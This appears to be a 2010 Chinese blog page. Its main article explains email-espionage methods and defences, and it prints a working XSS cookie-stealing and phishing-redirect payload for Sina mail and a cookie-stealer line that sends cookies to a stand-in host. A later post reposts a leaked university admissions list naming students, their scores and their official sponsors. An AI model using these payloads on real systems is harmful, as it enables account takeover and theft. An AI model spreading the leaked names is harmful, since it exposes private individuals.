4/22/2010

Fwd: 防御邮箱间谍


作者:bizlai  来源:可能吧

如果说中国走在网络战争的前沿,你可能觉得胡扯。发动网络战争并不复杂,一般有三种类型:攻击基础设施、窃取机密数据、瘫痪网络服务。而本文,将重点谈及中国窃取机密数据的邮箱情报攻击,几乎从来没有哪个国家能像中国因维稳不惜任何代价而秘密地监听国内外的敏感人士。

对于电子邮箱攻击,你注意到国外媒体批露的中国攻击事件与日俱增,如本月9号,纽约时报记者声称他们的邮箱被攻击而Twitter上的敏感人士开始越来越多的抱怨。你可能会质疑,有何事实数据可证明他们的邮箱确被攻击?这是一个好问题,因为他们无法跟踪攻击来源与防御被攻击,那么,常见的攻击手法是怎样的?我们如何跟踪攻击来源?又如何防御邮箱间谍的攻击?

一、你是局外人?还是受害者?

1月,Google向中国提出没有审查机制的G.cn, 并声称有人试图入侵中国维权人士的Gmail,14日,McAfee就IE 0day的分析,将此次大规模的窃取机密数据(知识产权)攻击称为极光行动。尽管Google事件余波已去,我想说的是:极光行动为什么没有攻击国内邮 箱?——显然!国内的邮箱具有过滤审查机制,这可以解释你的邮箱为何会丢信,更重要的是,一纸红头文件可未经用户许可泄露邮件数据,若有不从,以涉黄之名拔网线威胁。

普通的用户会这样认为:我不是敏感人士,我不会遭到电邮攻击。这样的想法很美好,让我们谈谈"话语权"吧。在三皇五帝的古代,骂皇帝是要砍头,而40年代末的建国期,是红色的革命语,时间回溯现在的极权主义国家,一切已然不一样了,尽管今天的新闻媒体仍在中宣部的约束之下,但互联网是一次革命,这个开放的网络空间,人人都是媒体,可在Twitter报导新闻,可用Wordpress发出声音,意识形态的大军是无法击溃互联网。

你会不会遭到电邮攻击?与你是不是敏感人士无关,而是视乎你在网络空间的声音、行为,以及现实生活中身份有关系。也不能说所有的电邮攻击都与政府脱不了干系,更有那些充满好奇心、乐于恶作剧的骇客。

二、攻击手法

你的Yahoo邮箱没有点击任何链接,但攻击者无需密码便控制住你的邮箱,这是什么回事?你的Gmail密码相当复杂,但为何收到密码重置的邮件?你登陆网易邮箱,点开邮件即重定向登陆入口,但网址却是真实的,这是为何?最后,来自国外越来越多的电邮失窃的新闻越来越多,你仍质疑中国没有能力侵入他国政要邮箱账户?

1、XSS钓鱼

这种攻击仍是目前最行之有效的方法,除了Gmail目前不存在XSS漏洞外,其它的Yahoo、Hotmail、网易、腾讯、搜狐、新浪等都存在XSS漏洞。XSS漏洞是啥?它的全称是Cross-site scripting,即跨站攻击,存在此漏洞的网站,能够被恶意攻击者劫持,它还派生了XSRF等等形式的利用,可谓Web木马。

08年,国内的邮箱都存在HTML标签跨站,漏洞都很弱智,比如<img src=javascript:alert()>插 在邮件标题、邮件内容、邮件附件处即可弹出一个可爱的alert。接下来,进步一点了,还是以HTML标签为主,搞个数据包工具看哪个变量没过滤、以及编 码转换。09年,又升级了,主要是国外的邮箱Gmail、Yahoo、Hotmail改以语法过滤,能利用的是CSS标签跨站,Gmail非常狠,除了早 期存在Google Docs附件跨站攻击,基本把恶意代码过滤得惨不忍睹。Yahoo在09年亦漏洞不断,但很负责,隔三差五地不断升级,而Hotmail令人失望,居然 1day过了一年都不补。

腾讯圈了一批牛人,忘记是Ph4nt0m还是80sec的, 比其它的网易、搜狐、新浪的邮箱安全性好一点,搜狐与新浪最烂,透露一下,它们其中一个仍存在字符集的跨站漏洞。那么,XSS攻击到底是怎样的形式呢?用 一个08年截获的新浪的HTML标签XSS漏洞说明,此漏洞是失效了,这年头基本没人直接公开0day,都养家糊口来着。

<INPUT TYPE="IMAGE" SRC="jav ascript:x7s='var Then=new Date();Then.setTime(Then.getTime()+7200*1000);if(document.cookie. indexOf(\'Cookie1=\') == -1){document.cookie=\'Cookie1=RAY;expires=\'+Then.toGMTString();window.parent.location.href=\'http://www.google.com/sina/index.php?url=\'+location.href+\'&c=\'+document.cookie.replace(/&/g,\'xxx\');}';eval(x7s)");">

此漏洞的形成在于新浪邮箱没有过滤空格,即过滤了javascript,但稍变形为jav ascript,便使得其后的恶意代码得以执行。这段代码有两个功能,获取Cookie并延长有效时间,并用父窗口 windows.parent.location重定向至钓鱼网站。完整的攻击流程是,将上述XSS代码插入至邮件内容,以HTML模式发送邮件至受害者 邮箱,受害者点开邮件时,会迅速转向sina钓鱼网站,而转向过程中,因采用parent,转向时,网址不会有变化,即不会显示钓鱼网址,而受害者在钓鱼 网站输入密码提交之,钓鱼网站截取密码再转回真实的邮箱,由于控制了Cookie,受害者因怀疑会再次点开那封攻击邮件,但并不会再次跳转,这令受害者产 生一种错觉,它以为邮箱仍是安全的。

2、窃取Cookie

你可以理解为窃取会话。你有过很多这样的经历,使用账户登陆某个网站,如Youku.com,关闭浏览器,再次打开youku.com,则不需要输入密码,这便是Cookie的 作用。为什么会有Cookie呢?由于Http是无状态协议,为了在各个会话传递信息,因而需要Cookie或Session来标记访客者的状态,这里的 Session是浏览器的Cookie里带了一个Token来标记,而服务器取得Token检查合性后便把服务器上存储的对应状态和浏览器绑定。总的意思 就是:我只要窃取你的Cookie并保持了Session不过期,便可无须密码访问你的电子邮箱内容。

如果你要查看自己的Cookie,给Firefox装个HttpFox扩展即可,如下图。

窃取Cookie很简单,可将上面的Javascript稍加改装即可:<INPUT TYPE="IMAGE" SRC="jav ascript:document.location='http://www.google.com/cookie /stealer.php?cookie='+document.cookie;">,然后在stealer.php写个保存接收的Cookie记 录的代码即可,如果你想让Session不过期,自己写个工具搞惦,每隔30秒请求一次目的页面。09年,Yahoo就被一帮人折腾了很多邮箱,不知道修 复了没有,国内几个邮箱也能被利用。

3、恶意软件

即木马、病毒、后门、间谍、键盘记录器……这些软件,最常见算是doc、pdf病毒了,好好的一个文档,挟带了木马,双击一打开,你就完了。最容易 受到攻击的是西藏人士、维权人士,然而,我不得不承认,这是一种非常阴险的手段,因为这毫无任何技术含量。这个攻击流程是,xxx部门获取经费收购或买断 木马软件、捆绑软件,一般外包给中国公司,然后这些公司的报价奇高,各省xxx部门买了后,按照说明书配置木马上线,再用捆绑工具与可信的文件捆在一起, 再用Google挑目标,比如找到abc.com网站,将该网站电子邮箱地址都整理出来,再用邮箱批量群发器不管三七十一把这些病毒通通发过去,再泡上一 杯茶盯着木马软件等着目标上线。

这种没有采用鱼叉式攻击所导致的后果是,买的木马软件、捆绑软件很快就无效了,因为一顿乱发,被安全软件给盯上或用户举报查杀掉了,这个例证就是最近的IE 0day及PDF 0day很快曝光,估计这前后都不到一年。而在前文,尽管中国没有比美国更好的网络战争实力,但是不差钱,他们不需要关注技术细节,只需要知道谁有0day,谁会挖掘0day,然后招安,买断一堆的0day,比如Discuz!、Wordpress、Firefox漏洞,照着教程去攻击。

那么如何防御这种恶意附件的攻击?当你再次在邮箱看见一堆的PDF、DOC、HTM压缩包时,简单的方法是,下载后不要打开,直接上传至Google Docs,要是显示一片空白或无关的内容,不管三七二十一提交到VirusTotal网站上。

4、社会工程学

这个方法很简单,先跟你套近乎下,然后东问问西问问获得碎片信息,基本就是掘地三层把目标的信息全收集起来,完了后,评估一下你的弱点在哪里,再从 弱点入手,这种攻击通常是雇佣了职业黑客来完成,因为过程比较复杂。举例子,攻击者有目标的邮箱,然后放到Google搜索,看目标注册了哪些网站,把这 些网站整理,逐个把这些网站入侵了并下载数据库,从中找到目标的网站密码,再用网站密码试邮箱密码,要是目标只用一个密码,那么他的邮箱就完了。

总体上来说,你在网络上的信息越少,便能够降低被入侵的威胁。但事实并不情人愿,Web2.0的社交网络流行,你注册了Twitter,天天叽叽喳 喳,一不小心把家世、住址、约会全都泄露了,你注册了豆瓣,天天左看右瞧还加了攻击者为好友,结果,他就知道你上网习惯与兴趣爱好,然后再用策略和你聊的 特别欢,某一天,他跟你讲:我找到一个非常牛B的电影了,你在Verycd下载瞧瞧。你一看,还真不错,真是你喜欢的。然后他又讲,能不能帮我登陆下 Gmail下载个文件看看是啥内容?我网速比较慢,我发你登陆密码。你听了,这小忙是得帮的,马上速度登陆对方的Gmail下载了压缩包,结果打开压缩包 的文档发现啥都没,到了第二天,你就很神奇地发现,哦哦~我的豆瓣、twitter全都登陆不了……

社会工程学攻击永不过时,因为人人都有被利用的心理弱点,不管是好心、私心、同情心啥的,都无法避免这种攻击。不过,这项攻击最大的缺点是,很耗时 间,短则几天,长则几月。这项攻击在敏感人士的社区很常见,如Forum、Google Groups等,那些攻击者最常见的手法盗用可信账户发送病毒附件。

5、MIT中间人攻击

以ARP攻击为例,A访问mail.sina.com,但攻击者B通过ARP劫持,可以使得你访问虚假的新浪钓鱼网站,而非真实的新浪。这种劫持通 信的手法可适合不同的场合,如劫持ADSL线路,这需要红头文件请本地电信局协助的,然后修改你的数据包返回假的数据包,举例而言,你想从QQ官方下载 QQ程序,攻击者修改数据包把QQ程序的下载地址改成木马地址,结果你就可以下载个木马回去了。如果你的通信是明文,没有采用SSL,攻击者可以直接看到 你密码。不过,我不太肯定,Gmail虽然采用了SSL,但用户名与密码却在网址中出现,有公司宣称能解开SSL,我现在仍然是半信半疑。

另外一种是hosts文件劫持,典型的例子是,某个家伙在Twitter.com说:无法访问youtube.com?Picasaweb?很简 单,修改hosts文件即可马上访问。你一听,哇,这么好,赶紧用记事本打开hosts文件,把对方提供的映射地址粘贴进去,再重新打开 youtube.com,哇,真神奇,打开了~~聪明的看客接下来知道会发生啥了。

对于ADSL线路劫持的手法,这种攻击也是行之有效的。另外,我们也得对某些代理软件保持警惕,天知道那些免费的socks5、vpn会干出令人震惊的事吗?

6、暴力破解

有三种,web穷举、smtp穷举、云穷举。在多数的情况下,前两种效率低下,且限制诸多,以Web Gmail为例,它有CAPTCHA限制、重复次数的限制,不过,我倒是碰到过一个Python版的穷举工具,但速度很慢。至于smtp,如果服务器做了 限制的话,比如现在网易对溯雪暴力破解工具是免疫的。云穷举,就我目前所知,我想这是最有效率的破解方法,已有安全专家Electric Alchemy利用亚马逊云服务Amazon Ec2运行Elcomsoft工具暴力破解PGP ZIP档案的例子。凭借云计算的超级计算机,以及一个分布式邮箱密码破解工具,暴力破解的速度将更快速。不过,这并不切实际,因为破解的成本太高了,需要很多米米。

暴力破解,这个古老的方法在目前只能针对极少的主流电子邮箱,尽管如此,但它对那些自架设的电子邮局仍然有效,因为它们没有CAPTCHA、重复尝 试次数、服务器资源等限制。总的来说,暴力破解对本地的加密文件破解比较有效率,但对网络邮箱账户的破解尚不能达到30%的成功率。

7、浏览器恶意脚本

上 过流氓软件的当吧?一旦打开IE,主页被锁定只能访问某个流氓的网站,嗯,没错,浏览器的脚本也能起到钓鱼攻击之用。比如IE的BHO(Browser Helper Object)劫持、Chrome、Firefox扩展钓鱼。就目前而言Chrome、Firefox的扩展钓鱼并不怎么流行,这比较麻烦,攻击者需写一 个看似合法可信的扩展,并植入后门,还需要方法让目标安装,这费力不讨好,但BHO容易多了,可以隐秘地安装而不会有提示。要防御这种攻击很简单,检视你 的Firefox、chrome是否有陌生的扩展、插件,不要在第三方的网站安装扩展。

8、内嵌登陆表单

这是社会工程学攻击的一种变形。当你打开某邮件,其内容部分嵌入了登陆表单,具体就是,你会看到一个要求你输入用户名、密码的登陆框。恰好RFA的新闻《维权人士邮箱和推特遭窃取、攻击》公布一张攻击实例图片,见下图。

如果你的Gmail收到上述的威胁恫吓邮件,不要担心,请在邮件的右侧点击下拉菜单,选择"这是网络欺诈",而Gmail将会稍后封锁此攻击者。普 通的用户不要误以为这是Gmail的安全漏洞,最简单的方法,选中邮件内容查看源代码,你可以发现并不存在恶意的Javascript脚本,而是HTML 标签,你在源代码找到Action位置,将其后的钓鱼网站向Google举报即可。

其它的Gmail用户不需要担心,这种内嵌表单钓鱼方式是通杀Gmail、Hotmail、Yahoo、网易、腾讯、搜狐的邮箱,由于不存在恶意的 Javascript,可称之良性HTML标签利用。看到这类威胁恫吓邮件,一是举报钓鱼邮件、钓鱼网址,二是删除该邮件,三是提醒你的朋友警惕。

三、防御

安全不能100%保证,只能最大限度地降低威胁,更来源于用户的安全意识。

1、防御XSS

如果你使用的Firefox浏览器,可安装NoScript扩展来屏蔽恶意的Javascript脚本。但你希望一劳永逸的话,非常简单,注册一个私人Google Groups, 并设置Gmail的过滤器,所有邮件一律转发至Google Groups。但如果也不喜欢注册Google Groups,那么你可以再注册Yahoo、Hotmail邮箱,使用Yahoo收取Gmail,再用Hotmail收取Yahoo,在这过程中,特定的 XSS代码会分崩离析。

2、防御恶意软件

.txt 文本格式永远是无害的(如果你的系统没有被映像劫持)。尽管如此,但我们仍难以避免地与.DOC、.PDF格式打交道,如果你使用的Gmail,那么一律 在线查看。而另一种可能是,你会收到RAR、7z等压缩格式,而邮件内容也颇具引诱性,那么你下载之后,请右键解压至单独的文件夹,而你不认识发件人并有 疑心时,永不要马上打开,请上传至Google Docs在线查看,或者提交到VirusTotal.com在线查毒。最好也在邮箱的签名行增加一行文字:我只接受.txt格式附件!其它格式附件的邮件一律删除。

3、防御身份盗窃

建议启用数字签名。它可以协助你确认签名者的身份及数据完整性,甚至你发出的邮件,对方能够获得确认,从而避免被第三方攻击者的滥用。与此同时,双方还可以明文约定,即在准确的时间范围内容发送邮件,如一般为每个星期日发送邮件,而未在此时间范围内的邮件而作废。

4、防御数据失窃

正如前文所提,你应该使用TrueCrypt加密附件。这款经典的加密工具备受赞誉,你应该保持经常使用的习惯。

5、防御身份泄密

你 的密码提示问题应该是模棱两可,比如"天下有多少颗月亮?"。而在个人注册信息处,不要留下你真实家庭地址、身份证号、电话号码、出生日期等信息,当你的 邮箱被攻破,这些信息能够证明你的身份。不要将这些信息设置为公开,而是保密,并阻止在Google Profiles可见。

6、使用Chrome浏览器

在 TippingPoint第三届Pwn2Own黑客大会,Apple's Safari, Mozilla's Firefox和Microsoft's Internet Explorer 8全部阵亡,你应该接纳黑客们的建议,使用Chrome浏览器,我不能保证Chrome会一直安全的,因为安全是个伪命题,就目前而言,Chrome是个 不错的选择。当然,下一届的Pwn2Own王者可能会是Firefox,不管如何,IE不是个好选择,因为中国的黑客正在折腾它。

7、使用Gmail

在我长达半年的测试,我仍然无法拿下Gmail,它太安全了,这使我郁火,当然,我也不能保证它也是最安全的,至少目前我没有听到Gmail存在安全漏洞的消息。

8、每月密码老化

微软声称,定期改密码没有用,只会浪费时间与金钱。我反对这种说法,当然,他们的调查结果是针对美国企业。我的建议是,密码请设置为12位,每月更改电子邮箱密码。间谍与黑客不一样,间谍才不会愚蠢地删除你的邮件并更改你的密码,那不可能,他们会暗中的监视你的邮件来往情况,伺机获得可起诉的把柄。

四、反跟踪

在你尚未成为他人的鱼之前,先搞翻这位渔人。

1、阻止邮件中的媒体

如果你不想攻击者获取到你的IP地址、浏览器、操作系统等信息,你应该阻止邮件中图片显示。这是为什么?显示图片则意味着你访问了该图片的服务器, 而该服务器则记录了你的访问数据。如果你已经安装了IIS、Apache,那么你可以打开http://localhost,再去查看它们的日志信息,看 看到底有没有记录你的访问信息。

而如果你没有装上IIS、Apache无法测试的话,你可以打开间谍猪:http://www.spypig.com/ 向自己的邮箱发送测试邮件。如果你使用的Gmail,那非常好,Gmail默认是阻止图片显示的。

2、跟踪发件人的来源

如 果你用的Foxmail客户端,那很简单:邮件——邮件信息——原始信息,即可看到发件人的IP地址。如果你使用的Gmail,你可以在邮件的右侧点击三 角形的下拉框,选择Show Original查看邮件头,要是看的头晕,可直接找"Received"那一行,将其后的IP地址放到www.myip.cn进行查询,以确认发件人来自哪里。

3、质询

陌 生人可能发送热点事件的邮件,诸如玉树地震死亡名单,维权人士名单,他试图激起你的好奇心以及人道主义、爱心等。你不应该马上查看,而是澄清你的疑问,这 份名单的出处来自哪里?你为什么拥有这份名单?你发送给我的理由是什么?要是对方无法消除你的疑问以及无回复,我建议你将这封邮件的附件下载,交提交到 VirusTotal上报病毒。

4、搜索

搜索对方的邮箱地址,看看在互联网是否有迹可寻。如果你使用Gmail,可在邮件中点击"Show details"看看此封邮件是否为群发邮件,如果是,直接回复所有人询问:这封邮件带有病毒吗?

5、检查过滤器

现在登陆你的Gmail,进入设置项,选择"Filters"标签,检查是否存可疑的邮箱地址,如果有,请迅速删除,否则,你的邮件全被偷了。

五、反思

从陆战、水战、空战、网战、太空战,全球各国都在试图提升各个空间作战实力,显然,在网战这块,中国是大小通吃,吃完之后还坚决反对没吃。以Google事件为例,华尔街日报昨天的报道《谷歌攻击者获得用户识别软件代码》,提及攻击者使用了谷歌工程师的工作站作为跳板,尽管我不能核实其真实性,但在《挑战五毛党》这篇分析文也提及Google中国区被安插内鬼。接下来,北京政府将如何应对Google后续事件呢?吃?抑或没吃呢?


愤怒!上海交大内网泄露出来的惊人内幕!


来源:猫扑
信息:这是2009年流传出的资料,曾在大小论坛有被删除经历

前几天,上海交通大学网络故障,不能连外面。面对信息闭塞的无聊苦闷,学生们在内部网乱逛。大概是教导处那位昏了头,下面这份东西共享却没设密码!呵呵, 学生将它贴到交大饮水思源站上后,20分钟后就被斑竹删了,不过已经成为了当天十大之二,不过后来者看不到内容罢了:)

虽然这很普遍,虽然大家心知肚明,呵呵,但这份材料是如此清晰的将情况摆在我们面前:  
机动指标使用讨论材料
] 1 校领导接收
] 招生特殊情况汇总
] 考生姓名 生源  分数  学校加分因素 专业情况 委托人拟解决意见
] 曹炎焱  江苏  620  生物医学工程、金融、电气、应用物理
] 胡光   安徽  609  环境工程、英语 发展研究中心徐诤处长推荐
] 韩超阳  上海  507 电子信息工程、计算机、自动化 闵行区委办公室韩朝阳之弟保证专业
] 袁毅婷  上海  482 5 测控 保证专业
] 李丰园  上海  466 120百分号
] 李巧   上海  449 外语 周永兴,电力局纪委书记李永鸣之女
] 曾诚   上海  470 5 工商管理高凤池,上海检查院二院副检查长曾勉之子 120百分号
] 郭佳   上海  458 20 w** 120百分号
] 刘晨   北京  582 钱永昌 120百分号
] 王昕   浙江  604 王宗先
] 徐明   四川  604 徐僖之孙
] 朱文谦  湖北  629 电气工程、船舶 国家计委
黄展鹏  湖北  632 全国政协,陈鼎常
] 章琼   浙江  574 (文科) 基金办
] 应    江苏  603 学指委、武装部
] 周慈   上海  454 5 程天纵妻妹
] 续琰   上海 434 5 新任上海副市长严隽琪,浦东司法局长陈建之子
] 张轶颖  上海 462 5 航天局长金壮龙 120百分号
] 叶鸣   上海 464 5 中医大party委书记张建中侄 120百分号
] 孙?   上海 467 20 信息工程、应用物理六院干部病房孙宜平主任侄 120百分号
] 宋鸿翔 上海 479 不进农学院 市妇联 保证专业
] 钱君 上海 471 市人大领导托 120百分号
] 张晶 上海 466 120百分号
] 盛涵涛 上海 455 5 测控、工程力学 盛校长之侄
] 蔡梦 上海 436 陈云青,大电气托
] 王兴华 上海 493 10 材料科学(保证一志愿) 保证专业
] 唐青 杭州 612 大电气副总裁托 已建议不要报考
] 李程贝 上海 469 瞿振元内侄 120百分号
] 朱晏燕 上海 461 10 材料科学(保证一志愿)蒋光照亲戚之女保证专业
] 李树青 上海 476 退学后重考 录取
] 刘文君 上海 蒋光照侄之亲戚
] 杨士佳 上海 458 10 吴毅雄,磁悬浮项目负责人杨永兴之子、向明中学校长拟投档考虑
] 张驰宁 上海 466 外语新华社教科文部主任张学全之女、南模中学校长 120百分号
] 欧洲 上海 443 朱物华外孙崔功之外甥
] 蒋春曦 四川 605 生物技术 西南交大蒋校长之子
] 唐鹤 四川 605 电子科技大学唐小我之子
] 许培恒 上海 陆燕荪
] 吴立婧 上海 吴敬儒侄女
] 吴则 北京 485 教育部、王大中,吴建平之子
] 闻毅 上海 467 5 上海市人事局闻处长之女 投档考虑
] 李宁 山西 432 教育部人事司管培俊司长
] 周凯 北京 547 总装备部
] 耿成厚 云南 566
] 汪远 上海 438 40 艺术特长生薛沛健,上海教育电视台台长汪天云之子
] 王玮 上海 459 上海教育超市总经理王星之子 120百分号
] 许颖 上海 479 电子科学与技术、工商管理 保证专业
] 王阳 江苏 598 10 王如竹堂妹
] 孔洁宏 上海 476 市考试院院长胡启迪
] 朱嘉炯 上海 468 市考试院院长胡启迪、太平洋口腔医院院长120百分号
] 唐月 江苏 605 市考试院副院长刘昌坤亲戚
] 李晶 上海 460 5 120百分号
] 李涛 江苏 622
] 秦? 北京 563 戴海波
] 程鹏 北京 569 教育部学生司副处长杨松
] 施永闻 上海 462 5 长宁教育局 120百分号
] 陈裕 江苏 620 清华大学副校长余寿之
] 桂园方 江西 629 团市委副书记张仁良内弟
] 向莹 上海 470 市财政局行财处 120百分号
] 2.中学校长推荐
] 编号 考生姓名 生源 分数 学校加分因素 专业情况 委托人
] 1 孙贤杰 上海 469 复旦附中
] 2 张思成 上海 466 大同中学
] 3 吴若玮 上海 466 南汇中学
] 4 苏呈彦 上海 477 5 光明中学
] 5 张瑞瑞 上海 格致中学
] 6 周瑾 上海 465 市二
] 7 张驰宁 上海 459 南模
] 8 马雅谨 上海 442 吴淞中学
] 10 黄墨寒 上海 470 10 位育中学
] 11 余美琳 上海 426 20 南模
] 12 曹晶 上海 建平中学
] 13 姚乾华 上海 460 5 嘉一中
] 14 许晶? 上海 464 闵行中学
] 2001年上海生源120百分号以内讨论材料
] 考生姓名 生源 分数 学校加分因素 委托人
] 唐本伟 上海 465 5
] 曾诚 上海 370 5 高凤池,上海检查院二院副检查长曾勉之子
] 叶鸣 上海 464 5 中医大party委书记张建中侄
孙? 上海 467 20 六院干部病房孙宜平主任侄
] 钱君 上海 471 市人大领导托
] 张晶 上海 466
] 李程贝 上海 469 瞿振元内侄
] 张驰宁 上海 466 新华社教科文部主任张学全之女、南模中学校长
] 朱嘉炯 上海 468 市考试院院长胡启迪、太平洋口腔医院院长
] 李晶 上海 460 5
] 施永闻 上海 462 5 长宁教育局
] 向莹 上海 470 市财政局行财处
] 杨士佳 上海 458 10 吴毅雄,磁悬浮项目负责人杨永兴之子、向明中学校长
] 孔洁宏 上海 476 市考试院院长胡启迪
] 朱晏燕 上海 461 10 蒋光照亲戚之女
] 4. 2001年上海生源机动指标讨论材料

] 编号 考生姓名 生源 分数 学校加分因素 委托人
] 1 李巧 上海 449 周永兴,电力局纪委书记李永鸣之女
] 2 周 慈 上海 454 5 程天纵妻妹
] 3 续琰 上海 434 5 严隽琪,浦东司法局长陈建之子
] 4 盛涵涛 上海 455 5 盛校长之侄
] 5 蔡梦 上海 436 陈云青,大电气托
] 6 刘文君 上海 蒋光照侄之亲戚
] 7 欧洲 上海 443 朱物华外孙崔功之外甥
] 8 许培恒 上海 陆燕荪
] 9 汪远 上海 438 40 薛沛健、于信汇,上海教育电视台台长汪天? 之子
] 5. 2001年外地生源机动指标讨论材料
] 1 王昕 浙江 604
] 2 章琼 浙江 574 文科 基金办
] 3 耿成厚 云南 566
] 4 徐明 四川 604 徐僖之孙
] 6 唐鹤 四川 605 电子科技大学唐小我之子
] 7 李宁 山西 632 教育部人事司管培俊司长
] 9 苏于果 江苏 629 推荐
] 10 曹炎焱 江苏 620
] 12 王阳 江苏 598 10 王如竹堂妹
] 13 唐月 江苏 605 市考试院副院长刘昌坤亲戚
] 14 李涛 江苏 622
] 15 陈裕 江苏 620 清华大学副校长余寿之
] 16 朱文谦 湖北 629 国家计委
] 17 黄展鹏 湖北 632 全国政协,陈鼎常 
] 18 王聪 湖北 631 多位领导托
] 19 唐青 杭州 612 大电气副总裁托
] 21 吴则?北京 485 教育部、王大中,吴建平之子 
] 22 周凯 北京 547 总装备部 
] 23 秦? 北京 563 戴海波
] 25 胡光 安徽 609 发展研究中心徐诤处长
] 26 吴立婧 上海 吴敬儒侄女
] 27 黄 剑 江苏 621 20 梁丰中学
] 28 龚子明 江西 629 江西师大附中
] 29 唐 月 江苏 605 进才中学
] 30 帅承? 湖北 624 华中师大一附中  
开始看见这 个东西,觉得有点意思,很多都是言之凿凿的,但是里面还有很多人是只提了一个名字,可能是(原稿)作者认为是众所周知的人物,可惜我孤陋寡闻,好在网络发 达,我们可以一点一点的考证一下,看看这份名单到底真实性如何。不查不知道,一查吓一跳。

前面的一段里面大部分都是有职务的,我 看就最后验证一下吧,但是最后那一段里面基本上就是只提一个名字,让我大感兴趣,一个一个看来:第一个阮雪榆(1933年1月--)压力加工专家。生于广东中山。1953年毕业于上海交通大学。上海交通大学塑性成形工程系主任、教授。1994年当选 为中国工程院院士。似乎还不是什么实权人物。第二个盛焕烨就不一样了,盛焕烨男,生于1943年8 月,教授,博士生导师,现任上海交通大学副校长。上海交大自动控制系本科毕业,历任上海交大计算机科学及工程系副教授,教授,副系主任,系主任现任上海交 大昂立股份有限公司董事;副校长出面应该可以摆平了。有没有更大的?我兴趣更浓了。

来 看这个"16 曹圣梁 1410607357 494 5 交通运输谢绳武"。乖乖,谢绳武,上海交通大学校长呀。算了,我直接来查交大的主要领导吧:
上海交通大学 校 长:谢绳武
副校长:盛焕烨 沈为平 叶取源 张圣坤 许晓鸣 张世民
C.P上海交通大学委员会 书 记:王宗光
副书记:陶爱珠 潘永华 陈 龙
常 委:王宗光 谢绳武 蒋秀明 陶爱珠 潘永华
陈 龙 盛焕烨 沈为平 王永华 田信灿
C.P上海交通大学纪律检查委员会纪委 书记:王永华

校长们除了"许晓鸣",都写了条子;书记们还算对得起party员,没有全锅端,但是头带的不好,书记和第一副书记 都写了条子,而且很恶劣的是,纪委书记王永华也写条子。这怎么去查呀?!

其他的人来头大部分也是响当当的,尤其是什么都不写只写 名字的,更是如此。比如:
w**,我开始在交大里面查,发现大人物叫这个名字的,于是到上海查,你猜是谁:上海市公~安~局局长 w**同志。

还有一个范祖德,也只写名字,想来甚是厉害。到google上查,条目主要有香港《經濟一週》社長范祖德,上海高科 房地产公司法人代表范祖德。看来是后者呀,但似乎一个法人代?不至于在交大"众所周知"了吧,再去交大查,有了:原上海交通大学副校长范祖德同志。

仔细查看里面的名字,共和国的部长们也榜上有名,不过基本上是退休的人士,比如,1984—1991年任中华人民共和国交通部部长钱永昌, 原国家机械部副部长陆燕荪等。当前在位的最厉害的当属新任上海副市长严隽琪了,类似的大官是教育部高校学生司司长瞿振元。里面教育口的官员很多,不过原作 者似乎没有仔细查对名单,王宗先当为交大书记王宗光,余寿之当为清华副校长余寿文,想必是打字员用五笔录入的。其它还有避"副"之讳的,比如,教育部人事 司管培俊司长应该是副司长管培俊,上海教育电视台台长汪天云也只是副台长。等等。
仔细看名单,还有有不少东西可以挖挖的。

1 教育口的人最多。上至教育部,下迄上海教委,区教委,甚至各大学,中学,校办企业,校董(蒋光照),院士。里面有一个头衔让我奇怪(可能是全国政协的面子 大):陈鼎常(全国政协委员、湖北黄冈中学特级教师)。

2 实权单位。公共安全专家局,电力,医院(真是FT,一个住院病房的主任都来了。),组织,人事局,外办。其实教育口的也大部分是实权职能部门,比如招生, 财务,人事等等。

3 企业。总裁们,想必钱能通神,当然现买现卖是不行的,应该是以前打好的基础了。

4 其他自认为很牛的人物。比如浙江电力局副局长赵义亮等。虽然你上海不归我管,但是电力系统一家亲,牛人在哪儿都应该很牛。

5 其他一些关联的人物也很有意思,比如"上海检查院二院副检查长曾勉托高凤池"一条,"上海检查院二院副检查长"想来也是来头颇大,但为什么还要托一个"高 凤池"呢??

此"高凤池"何许人?一查,一个村长能这么厉害?再仔细一看,这个村长可不一般,1998上海综合实力百强村,上海 旗忠集团公司法人代表,这还不算,旗忠村位于上海闵行区,想必地头也很厉害。所以这个双保险应该问题不大。


4/21/2010

“王虫虫没家”引爆百度知道 网友频频发问求平安

  一出人间悲喜剧正在全球最大中文互动问答平台百度知道上演。来自全国各地的用户正在该平台频频发问,追寻一个名为"王虫虫没家"的陌生网友的下落, "是否平安"、"身在何处"、"为什么还不现身",更有网友已发起爱心人肉搜索。据统计,近几天来这一ID在百度知道的检索量正在呈几何倍数爆增。

   一切都源于去年7月这一ID在百度知道的一个发问:"地震让我在北川县曲山镇的通讯店全部损失,地震后我为了就业就到青海省玉树州开了一个手机维修 点……我希望税务部门能给我减免税收……想知道具体的政策……"在知道平台近1亿问题中,类似的咨询问题司空见惯,但玉树地震发生之后,随着这一发问被重 新翻起,"王虫虫没家"瞬间成为整个中文互联网最被关切的人。

   "王虫虫没家,你现在还好吗""王虫虫找到了吗",知道网友最关心是 "王虫虫"的安危,是否在玉树地震中躲过一劫;也有网友发问"王虫虫为什么没有家",引人唏嘘;更有网友已顾不得这是一个"问答"平台,直接发贴"大家都 很关心你,祝你平安",甚至开始发起"人肉搜索";在回复中,一位网友动情地说"希望因为沉重的税收,让你在北京时间2010年4月14日7时49分之前 离开了玉树。"

   网友们一遍遍重复着"王虫虫"的名字,为这个素昧平生的ID祈福。此时,百度知道已不单纯是个传播知识、分享智慧的 平台,更成为凝聚了亿万网友爱心和关切的生命平台。而到目前,这场由"最悲情地震人物"引发的网络风暴已从知道平台扩散至整个互联网,引发点击超过千万, 回复至少上百万。

   截止现在,"王虫虫"在互联网上留下的蛛丝马迹仅仅是这一个发问,其注册资料显示性别为女性,而年龄、居住地等资 料栏均为空,登录信息显示其最后一次登录距今已超过一个月。百度知道的工作人员表示,百度知道将一直关注这个ID,当"王虫虫没家"这个ID一旦点亮,将 立即通报给给所有关注王虫虫的广大网友。346bd85c343c7b7bfbf2c019[1].jpg

悼念玉树地震死难者,教你如何将整个网页变黑白色(灰色)的

第一情况:把下面代码复制到你网页的<head></head>中就可以了实现

<style type="text/css">
<!--
BODY {
filter:progid:DXImageTransform.Microsoft.BasicImage(grayscale=1);
}
-->
</style>

第 二情况:如果你的站已有CSS,那加入

html { filter:progid:DXImageTransform.Microsoft.BasicImage(grayscale=1); }

就 可以了

第三情况:如果你的CSS中已有BODY {}那么你就加入

filter:progid:DXImageTransform.Microsoft.BasicImage(grayscale=1);
例 如:

BODY {
FONT-SIZE: 12px; MARGIN: 0px; COLOR: #000000; BACKGROUND-COLOR: #ffffff;
filter:progid:DXImageTransform.Microsoft.BasicImage(grayscale=1);}

